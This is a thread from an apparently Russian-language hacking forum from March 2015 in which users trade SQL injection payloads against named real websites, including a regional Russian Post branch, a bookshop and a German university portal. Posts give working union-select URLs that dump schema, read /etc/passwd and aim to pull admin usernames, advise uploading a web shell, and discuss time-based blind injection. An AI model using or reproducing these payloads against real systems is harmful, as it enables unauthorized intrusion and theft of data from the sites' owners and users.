 |
|

10.03.2015, 19:46
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от teh
А как вы узнали что таблица лежить в базе ftpusers. Никак немогу понять, можете рассказать пожалуйста
Сообщение от None
http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,version(),(select(@x)from(select( @x:=0x00),(select(0)from(information_schema.column s)where(table_schema!=0x696e666f726d6174696f6e5f73 6368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,ta ble_schema,0x2e,table_name,0x3a,column_name))))x), 4,5,6,7+--
либо почитай мануал, как узнать таблици и колонки в БД
Сообщение от None
http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,version(),table_name,4,5,6,7+from +information_schema.tables+--
права БД рутовые, кавычки не фильтруются и не слешируются:
Сообщение от None
http://www.volgufps.ru/pochtamt5.php?pocht=%27-1%27+union+select+1,version(),load_file(%27/etc/passwd%27),4,5,6,7+from+mysql.user+--
вам остается только найти врайтабельную папку и залить шелл
P.S: 2011 УФПС Волгоградской области
- филиал ФГУП «Почта России»
Помните об ответственности ломая подобные ресурсы!!!
|
|
|

10.03.2015, 21:19
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами:
8128406
Репутация:
-2
|
|
Cпасибо парни, помогли
P.S. Спасибо, забыл совсем про отвественость
|
|
|

10.03.2015, 21:34
|
|
Новичок
Регистрация: 29.12.2010
Сообщений: 1
С нами:
8089526
Репутация:
2
|
|
Есть blind sql injection, как правильно узнать длинну получаймой колонки. Использую такой запрос:
Код:
SELECT IF (SUBSTRING(LENGTH(login),{x},1) = {y}, SLEEP(5), 0) FROM users LIMIT 1
где {y} перебираймые значения "0,1,2,3,4,5,6,7,8,9"
Проблема в том, что substring возвращает "0", когда положение {x} вышло за длинну записи. В итоге получается, что при попытке получить второе значение (x=2), а истинная длинна = 5, то получаем, что длинна колонки = 50.
Собственно задача - правильно узнать длинну содержимого колонки, без лишних запросов.
upd. Решено
|
|
|

10.03.2015, 23:23
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от scr1m77
Есть blind sql injection, как правильно узнать длинну получаймой колонки. Использую такой запрос:
Код:
SELECT IF (SUBSTRING(LENGTH(login),{x},1) = {y}, SLEEP(5), 0) FROM users LIMIT 1
где {y} перебираймые значения "0,1,2,3,4,5,6,7,8,9"
Проблема в том, что substring возвращает "0", когда положение {x} вышло за длинну записи. В итоге получается, что при попытке получить второе значение (x=2), а истинная длинна = 5, то получаем, что длинна колонки = 50.
Собственно задача - правильно узнать длинну содержимого колонки, без лишних запросов.
может вместо login пехать что-нить такое: select column_name from information_schema.tables where table_name='users'
|
|
|

11.03.2015, 00:54
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Сообщение от None
http://shop.priddybooks.com/SearchResultsNew.aspx?order=asc&search=123
есть тут что нибудь?
|
|
|

11.03.2015, 10:11
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от Br@!ns
есть тут что нибудь?
Есть, mssql-инъекция.
|
|
|

11.03.2015, 18:01
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Сообщение от YaBtr
Есть, mssql-инъекция.
Так же думаю, но раскрутить не получается. Дадите наводку?
|
|
|

11.03.2015, 18:02
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 448
С нами:
8265206
Репутация:
40
|
|
Сообщение от Br@!ns
есть тут что нибудь?
Сообщение от YaBtr
Есть, mssql-инъекция.
Нету
Присутствует фильтрация символов, в случае ошибки вываливает редирект вот сюда
|
|
|

11.03.2015, 18:31
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от 5maks5
Нету
Присутствует фильтрация символов, в случае ошибки вываливает редирект
вот сюда
Читайте, изучайте!
https://technet.microsoft.com/en-us/library/cc512676.aspx
|
|
|

12.03.2015, 13:04
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.hochschulkompass.de/studium/suche/profisuche/search/1/studtyp/3.html?tx_szhrksearch_pi1%5Bxtend%5D=1&tx_szhrksearch_pi1%5Bbundesland%5D%5B0%5D=2&tx_szhrksearch_pi1%5Bresults_at_a_time%5D=100&tx_szhrksearch_pi1[pointer]=1&tx_szhrksearch_pi1[detail]=all&tx_szhrksearch_pi1%5Bbesform%5D%5B0%5D=d'+union+select+null,version()||chr(58)||current_user||chr(58)||current_database()+--[/COLOR][/COLOR]
Как выковырять данные be_users.username ?
PS движок типо3, эти данные там есть точно!
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|